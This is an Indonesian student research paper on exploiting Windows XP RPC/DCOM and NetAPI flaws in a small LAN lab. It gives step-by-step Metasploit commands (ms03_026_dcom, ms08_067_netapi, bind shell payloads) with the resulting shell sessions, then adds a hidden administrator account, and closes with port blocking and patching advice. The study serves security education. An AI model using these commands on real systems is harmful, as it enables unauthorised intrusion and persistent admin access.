Eksploitasi Keamanan Sistem Operasi Windows XP Pada Jaringan LAN NASKAH PUBLIKASI
Disusun Oleh : ASADU RAHMATIKA ROCHIM 04.11.0511
JURUSAN TEKNIK INFORMATIKA SEKOLAH TINGGI MANAJEMEN INFORMATIKA DAN KOMPUTER
“AMIKOM“ YOGYAKARTA 2010
1
2
ABSTRACT On the network (network) there are various kinds of protocols that each have unique functions. One of them is the protocol Remote Procedure Call (RPC). This protocol provides an inter-process communication mechanism that allows a program to run on a computer without a felt any code execution on a remote system (remote system). In this protocol there are also other functions such as protocol message, RPC features, etc.. Each of these functions are contained in three layers of RPC is the highest layer, middle, and lowest. Each layer in contact with different parts of the operating system. RPC protocol implementation includes a more complex sectors, ranging from port mapping, the language used in the RPC programming and how it works. In addition to discussing the RPC protocol, in this study will be discussed on the exploitation RPC protocol on Windows XP and RPC protocol is one of intruders in Windows XP operating system Exploitation is the misuse is the original function of this protocol for other activities which harm nature diremote parties and make the system the information contained therein is not safe.
Keywords:
Remote
Procedure
Call,
Exploitation,Information
Systems,
VCVCVCVOperating Systems
3
PENDAHULUAN 1.1 Latar Belakang Masalah. Windows XP merupakan salah satu sistem operasi yang banyak digunakan dengan salah satu keunggulannya yaitu User-Friendly. Dibalik keunggulan tersebut, integritas sistem operasi untuk berjalan pada aplikasi jaringan jauh tertinggal dibandingkan sistem operasi lainnya seperti Linux atau Unix. Salah satu kelemahan sistem operasi ini yang banyak digunakan para penyusup adalah protokol RPC ( Remote Procedure Call ). Serangan celah keamanan RPC Dcom yang pernah populer di tahun 2003 terjadi pada tanggal 12 Agustus 2003 dimana dimanfaatkan dengan sangat baik oleh worm Lovsan atau lebih dikenal dengan nama Blaster dan variannya menyebabkan semua komputer Windows NT / 2000 / XP / 2003 saling melakukan scanning untuk menyebarkan dirinya dan sempat menggegerkan jagad internet. Eksploitasi celah keamanan RPC Dcom kemudain kembali muncul di tahun 2004 -2005 dimana trend yang terjadi adalah satu malware yang memiliki kemampuan mengeksploitasi berbagai celah keamanan dan terkadang satu malware mengeksploitasi belasan celah keamanan. Setelah serangan tersebut mereda, kelihatannya di akhir tahun 2008 ini kembali muncul peluang eksploitasi baru atas celah keamanan RPC Dcom lagi dan kali ini cukup serius karena Windows XP dengan Service Pack 3 sekalipun tetap rentan terhadap eksploitasi celah keamanan RPC Dcom baru ini.
4
2. Subjek Penelitian Subjek penelitian adalah pengujian operating sistem yang direncanakan untuk pembelajaran dan mengetahui celah kelemahan pada sistem tersebut. Pengujian ini dilakukan dengan tiga buah komputer yang saling dikoneksikan satu sama lain dalam satu jaringan local (LAN). Dan selanjutnya yang perlu diperhatikan dari penelitian tersebut bagaimana teknik melakukan penyusupan ke dalam komputer lain dan bagaimana pencegahannya agar tidak terjadi serangan atau dapat dikendalikan oleh user lain. Sehingga komputer kita aman dari para penyusup. 2.1 Perangkat Lunak. Perangkat lunak yang digunakan dalm penelitian ini adalah sistem operasi WINDOWS XP Service Pack 1,2 dan 3, serta aplikasi sebagai tools untuk melakukan eksploitasi yaitu Metasploit 3. Metasploit.
Gambar 3.2 Metasploit Metasploit Framework adalah sebuah platform pengembangan untuk membuat tool keamanan dan exploit. Metasploit Framework terdiri dari tools, libraries, modules dan user interfaces. Fungsi dasar dari metasploit framework
5
adalah memunculkan module, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Jika exploit berhasil, payload akan tereksekusi pada sistem target dan pengguna akan disediakan sebuah shell untuk berinteraksi dengan payload. Metasploit berjalan pada berbagai operating sistem, termasuk Linux, Windows, Mac OS X, dan sebagian besar dari BSD. Metasploit telah digunakan pada berbagai macam platform hardware, dari Unix mainframe sampai ke iPhone. 3. Analisis Sistem. 3.1 Anlisis Kinerja Sistem Pada Jaringan. Berdasarkan topologi jaringan yang ada, maka dalam penelitian ini penggunaan topologi star yang telah dibuat tidak mengalami gangguan pada pertukaran jalur data dari satu kompter ke komputer yang lain atau dengan kata lain kinerja jaringan serta sistem dalam pertukaran data berfungsi dengan baik, dikarenakan computer yang terhubung dalam jaringan berjumlah 3 buah atau jaringan kecil. 3.2 Analisis Kelemahan Sistem. Kelemahan RPC pada Sistem Operasi Windows. Sistem operasi Microsoft Windows XP adalah salah satu sistem operasi yang mendukung protokol RPC. Kelemahan protokol RPC pada sistem operasi ini terletak pada fungsi RPC yang berhubungan dengan pertukaran message melalui protokol TCP/IP. Hal ini mempengaruhi bagian antar-muka Distributed Component Object Model (DCOM) yang berhubungan dengan RPC, yang akan mendengarkan ( listen ) port-port RPC
6
yang tersedia. DCOM adalah protokol yang berfungsi untuk mengaktifkan komponen pada perangkat lunak ( software ) agar dapat berkomunikasi langsung dengan jaringan. Protokol ini didesain untuk penggunaan jaringan multi tranport termasuk protokol Internet misalnya HTTP. Kecenderungan lain berpindah pada nomor port lain yang dapat digunakan untuk mengirim pesan tertentu yang telah dimanipulasi, seperti port 135, 139, 445, 593 pada remote komputer. Melalui port-port ini maka seorang user dapat melakukan permintaan yang dapat mengekploitasi dengan menjalankan kode dengan hak sistem lokal. Berikut ini tabel protokol yang sering dimanfaatkan pada ekploitasi RPC. Tabel 3.1 Port dan Protokol yang umum dieksploitasi Urutan Protokol yang digunakan oleh Port TCP atau UDP Endpoint Mapper ncacn ip tcp
TCP/135
ncacn ip udp
UDP/135
ncacn np pipe emapper
TCP/139 dan TCP/445
ncacn http
TCP/593
ncacn http dengan servis COM Internet aktif
TCP/180
Analisis PIECES Sistem. Dari pemaparan tersebut maka penulis anlisa dengan metode PIECES ( Performance, Information, Economic, Control, Efficiency, Service ). Sebagai berikut:
7
1. Analisis Kinerja (Performance Analysis) Sistem windows XP yang lama memiliki kelemahan pada sistem RPC sehingga akan berdampak dalam kinerja sistem. Kinerja tersebut akan tergangguan ketika seorang penyusup telah mampu mengeksplotasi sistem. Gangguan kinerja sistem bergantung dari kegiatan yang dilakukan oleh penyusup, namun jika penyusup sedang tidak melakukan kegiatan terhadap komputer yang tereksploitasi maka gangguan terhadap sstem tidak berpengaruh. 2 . Analisis Informasi (Information Analysis) Sistem lama tidak mampu memberikan keamanan informasi, karena infomasi yang ada pada sistem lama ketika sistem tereksploitasi maka seorang penyusup dapat melakukan tidakan apapun terhadap informasi yang ada pada sistem.dan dapat menghambat informasi pada sistem ketika diakses oleh penyusup.
3.
Analisis Ekonomi (Economy Analysis)
Secara ekonomi sistem lama yang telah berjalan pada saat ini membutuhkan biaya yang sangat besar ketika sistem telah tereksploitasi oleh penyusup. Kemungkinan terjadi adalah adanya kerusakan sistem dan pengambilan data-data yang ada pada sistem lama. jika itu terjadi maka sistem harus di instal ulang dan data yang telah diambil oleh penyusup kemungkinan akan hilang dan jika data itu benar-benar hilang maka dilakukan pencarian data ulang.
4.
Analisis Pengendalian (Control Analysis)
8
Pada sistem yang sudah ada, pengendalian dapat dilakukan oleh user lain sepenuhnya tanpa adanya memperdulikan status hak acces sistem. Hal inilah yang menjadi penyebab utama kelemahan pada sistem lama. 5.
Analisis Efisiensi (Efficiency Analysis) Sistem lama yang berjalan belum sepenuhnya efesien, mengingat ketika
sistem itu tereksploitasi maka sistem akan dikendalikan oleh penyusup sistem dan ketika penyusup menghilangkan hak acces terhadap sistem dan mengambil data yang ada. maka pemilik sistem akan melakukan install ulang sistem dan membuat data-data ulang yang telah diambil oleh penyusup. Hal ini akan membutuhkan biaya waktu dan sumberdaya yang menyebabkan tidak ke-efisienan. 6.
Analisis Pelayanan (Service Analysis) Pelayanan informasi yang dihasilkan oleh sistem lama belum dapat
memenuhi kebutuhan informasi yang diperlukan oleh pemilik sistem. Kelemahan pada servis RPCSS pada sistem lama adalah penyebab utama dari pelayan sistem. 3.3Stategi Pemecahan Masalah.. Dari analisa permasalahan diatas penulis menggaris bawahi bahwa permasalahan utama pada sistem lama windows XP adalah tingkat kelemahan pada port 135,445, dll seperti pada tabel 2.1 diatas. Untuk itu strategi pemecahan masalah yang penulis lakukan adalah \ kelemahan pada sistem lama dalam hal ini port-port yang terkait dengan sumber permasalahan akan ditutup atau dapat juga dilakukan pemfilteran dengan firewall atau sejenisnya. Adapun pembahsan mengenai hal tersebut akan disampaikan pada bab berikutnya. Sedangkan topologi jaringan tetap menggunakan topologi
9
yang lama dikarenakan kebutuhan akan jaringan masih dalam tingkat kecil. Jika pada jaringan yang lebih luas atau besarpun penulis menyarankan menggunakan topologi Star walaupun dari segi instalasi akan memerlukan banyak pengkabelan, tetapi dari segi penggunaan jika salah satu node putus maka node yang lain masih tetap berjalan. 4. Implementasi Eksploitasi RPC. Eksploitasi disini yaitu dengan melakukan penyusupan ke sistem operasi Microsoft Windows XP SP1, Windows XP SP2, dan Windows XP SP3. 4.1 Eksploitasi Menggunakan Program. Pada implemenatasi ekplotasi ini penulis akan menguji sistem operasi Windows XP. Pengujian Windows XP SP1 Sebelum melakukan pengujian lebih jauh. Kita akan melakukan pengujian koneksi ke komputer yang akan kita serang dalam hal ini komputer2 dengan no IP address 192.168.0.2 . Pengujian tes koneksi dapat dilakukan dengan mengetikkan script “ ping 192.168.0.2 “ pada Command Prompt seperti tampak pada gambar di bawah ini.
10
Gambar 4.4 akses command prompt komputer2 di komputer1
Pada gambar diatas tampak pengkoneksian telah berhasil dengan keterangan terdapat 4 paket data terkirim 0% lost ke no IP 192.168.0.2. Kemudian pada tahap selanjutanya kita aktifkan program Metasploit dan kita pilih Menu Console. Setelah itu kita akan melihat berbagai macam exsploit yang ada pada Metasploit dengan perintah : msf > show exploits
dan sebagian dari list seluruh exploit yang ada kira-kira seperti dibawah ini : Exploits ======== Name
Description
-----
----
----------------
windows/dcerpc/ms03_026_dcom
Microsoft RPC DCOM Interface Overflow
windows/dcerpc/ms05_017_msmq
Microsoft Message Queueing Service Path
Overflow
Selanjutnya penulis menggunakan exsploit windows /dcerpc/ ms03_026_dcom untuk menyerang komputer2. msf > use windows/dcerpc/ms03_026_dcom msf exploit(ms03_026_dcom) >
Selanjutnya kita perlu set terlebih dahulu RHOST dari komputer target dengan mengetikkan : msf exploit(ms03_026_dcom) > set RHOST 192.168.0.2 RHOST => 192.168.0.2
Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 135. Untuk exploit target diisi
11
dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. msf exploit(ms03_026_dcom) > set HOST 0 HOST => 0
Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini menggunakan tcp_bind_shell (akses command prompt di kompi target) : msf exploit(ms03_026_dcom) > set payload windows/shell/bind_tcp payload => windows/shell/bind_tcp
untuk melihat payload apa saja dalam Metasploit kita gunakan perintah : msf exploit(ms03_026_dcom) > show payloads
Selanjutnya kita jalankan exploit : msf exploit(ms03_026_dcom) > exploit
Gambar 4.6 hasil proses dan exploitasi
Dari hasil diatas, kita telah berhasil masuk ke komputer target dalam hal ini komputer2 dan kita telah mengakses Command Prompt komputer2. selanjutnya
12
kita akan coba melihat IP Configurasi pada komputer2 dengan cara ketik perintah ipconfig C:\WINDOWS\sistem32> ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.0.2 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : C:\WINDOWS\sistem32>
Pengujian pada Windows Untuk pengujian pada Windows
XP SP2 ini penulis telah melakukan
percobaan dengan metode yang sama namun tidak dapat menembus target yang kali ini adalah komputer3 dengan no IP Address 192.168.0.3. hasil dari percobaan pada windows XP SP2 ini sebagai berikut: Test konekesi ke komputer3
Gambar 4.7 tes koneksi komputer ke komputer3
Gambar 4.7 hasil test koneksi ke komputer3. Kemudian penulis mencoba menyerang dengan metode yang sama juga namun berbeda eksploit yang akan kita gunakan untuk penyerangan. Percobaan
13
kali ini menggunakan eksploit
windows /smb/ms08_067_netapi
eksploit ini bekerja
untuk melumpuhkan NetAPI32.dll pada windows XP SP1,2 dan 3. Hasil percobaan Msf > show exploits Exploits ======== Name
Description
----
--nwapi32.dll
windows /smb/ms06_066_nwwks
Microsoft Services MS06-066 nwwks.dll
windows /smb/ms08_067_netapi
Microsoft Server Service Relative Path Stack Corruption
msf > use windows /smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3 RHOST => 192.168.0.3 msf exploit(ms08_067_netapi) > show payloads generic/shell_reverse_tcp
Generic Command Shell, Reverse TCP Inlinen
Selanjutnya kita set payloads msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp payload => generic/shell_bind_tcp msf exploit(ms08_067_netapi) > set HOST 0 HOST => 0
Sekarang kita jalankan exploitnya msf exploit(ms08_067_netapi) > exploit
dan hasilnya : host => 0 >> exploit [*] [*] [*] [*] [*]
Started bind handler Automatically detecting the target... Fingerprint: Windows XP Service Pack 2 - lang:English Selected Target: Windows XP SP2 English (NX) Triggering the vulnerability...
14
[*] Command shell session 1 opened (192.168.0.1:1794 -> 192.168.0.3:4444) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS \sistem32>
Dari gambar diatas kita telah masuk ke sistem komputer3. dan sekali lagi terdapat celah yang bisa kita masuki pada sistem operasi windows xp SP2 dan SP3 4.2 Eksekusi Kode. Tahap ini merupakan tahap eksekusi kode yang diinginkan. Pada tahap ini komputer1 dapat melakukan melakukan apa saja. Pada contoh kasus ini akan dicoba untuk membuat sebuah account baru dengan hak seorang Administrator. Eksekusi kode pembuatan user baru ini pada setiap operating sistem yang kita eksploitasi menggunakan metode yang sama. Setelah masuk pada sistem komputer2, terlebih dahulu kita lihat siapa saja yang memiliki hak login di komputer2 caranya ketik perintah net
user.
C:\WINDOWS\sistem32>net user
Dan hasilnya sebagai berikut :
Gambar 4.10 account user pada sistem
15
Selanjutanya kita gunakan perintah berikut untuk mengeksekusi pembuatan user baru dengan password 123 : net user asadu2 123 /add
dan kita lihat hak user baru tadi dengan perintah: net user asadu2
kita lihat hasilnya
Gambar 4.12 info account user baru pada sistem Dari gambar diatas dapat kita ketahui hak user asadu2 masih sebagai user biasa atau tidak dapat melakukan pengendalian terhadap sistem secara penuh. Untuk itu hak user ini kita diubah menjadi hak Administrator dengan cara ketik perintah :
16
net localgroup Administrators asadu2 /add
dan untuk melihat hasil pengubahan hak menjadi administrator ketik pertintah : net user asadu2
Dengan demikian pada pada komputer2 akan didapatkan satu user baru bernama ”asadu2” dengan hak seorang administrator. Implementasi ini dapat dilakukan untuk tujuan baik, misalnya pada kasus hilangnya password seorang user yang memiliki hak sebagai Administrator. Namun pada dasarnya hal ini sendiri adalah kelemahan utama didalam sistem keamanan pada sistem operasi. Selain pembuatan user baru, eksekusi kode yang dapat dilakukan lainnya antara lain upload atau download data dari dan ke komputer2, perusakan sistem, dll. 4.3 Pencegahan Eksploitasi RPC Berikut ini adalah beberapa cara yang dapat digunakan untuk melakukan hal ini ( dikutip dari buletin keamanan Microsoft MS03-026 dan buletin keamanan Microsoft MS08-067): 1. Memblokir port 135, 137, 138 dan 445 pada UDP dan port 135, 149, 445, dan 593 pada TCP melalui Firewall. Disfungsikan COM Internet Services ( CIS ) dan RPC melalui HTTP yang menggunakan port 80 dan 443 terutama pada jaringan remote yang menggunakan VPN ( Virtual Private Network ) atau sejenisnya. 2. Gunakan personal Firewall seperti Internet Connection Firewall. 3. Blokir semua port sering diekploitasi dengan menggunakan filter IPSEC. 4. Disfungsikan fitur DCOM pada setiap komputer atau server. Disable
17
DCOM on all affected machines 5. Khusus Sistem operasi buatan Microsoft, selalu update security Patch untuk meningkatkan keamanan sistem operasi tersebut. Dampak dari pemblokiran tersebut adalah diblokirnya file sharing yang ada pada sistem dan ketika komputer terkoneksi jaringan maka akan sangat merugikan. Namun agar sistem dapat bekerja secara optimal, sebaiknya dan disarankan untuk mengupdate sistem dengan mempatch kesalahan pada sistem tersebut ke Microsoft. Formatted: Bullets and Numbering
5. 1 Kesimpulan Dari implementasi yang telah dilakukan dapat diambil kesimpulan sebagai berikut: 1. Terdapat celah pada remote procedure call system Operasi Windows XP 2. Dampak yang terjadi dari kelemahan tersebut user yang tidak diinginkan dapat mengambil alih system. 3. Sesungguhnya tidak ada sistem yang seratus persen aman dari kebocoran dan kelemahan. Yang ada adalah sistem yang belum teruji keamanannya. 5.2 Saran Sebagai seorang pemilik komputer personal atau seorang administrator sudah seyogyanya untuk terus menerus mengambil tindakan preventif agar sistem yang dijaganya tetap stabil dan terhindar dari kelemahan yang bisa dimanfaatkan orang lain. Tindakan tersebut dapat berupa: 1. mengupdate sistem secara keseluruhan ke vendor pembuatnya. 2. memasang software anti virus dan mengupdatenya setiap waktu
18
terkadang banyak orang yang tidak bertanggung jawab melakukan eksploitasi sistem dengan menggunakan metode yang sudah pernah di lakukan sebelumnya, untuk itu jika kita seorang administrator jaringan hendaknya tetap mempelajari metode eksploitasi baik yang telah lampau di gunakan ataupun yang baru, sehingga sistem kita tidak mudah tereksplotasi dan jika tereksploitasipun kita sudah tahu cara penangananya
Daftar Pustaka Pangera Ali Abbas, Ariyus Doni, 2005, “Sistem Operasi”, Penerbit Andi, Yogyakarta. Tanembaum S Andrew., 1996,“ Jaringan Komputer Edisi Bahasa Indonesia Jilid 1”, Pearson Education Asia Pte.ltd,Prentice-Hall Inc. Oetomo Dharma Sutedjo Budi. Dkk, 2006,”Konsep & Aplikasi Pemrograman Client-Server dan Sistem Terdistribusi”, Penerbit Andi, Yogyakarta. Syahfrizal Melwin, 2005, “Pengantar Jaringan Komputer”, Penerbit Andi, Yogyakarta. Outlines Schaum’s, 2004, “ Computer Networking ”, Penerbit Erlangga, Jakarta. Marki
Tommy,
2003,”
Keamanan
System
Informasi
RPC“,
http://www.cert.or.id/~budi/courses/security/2006/tommy_report.pdf, diakses tgl 15 September 2009. www.metasploit.com, diakses tanggal 2 September 2009. http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx,
diakses
tanggal 24 November 2009.
19
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx, diakses tanggal 24 November 2009.
20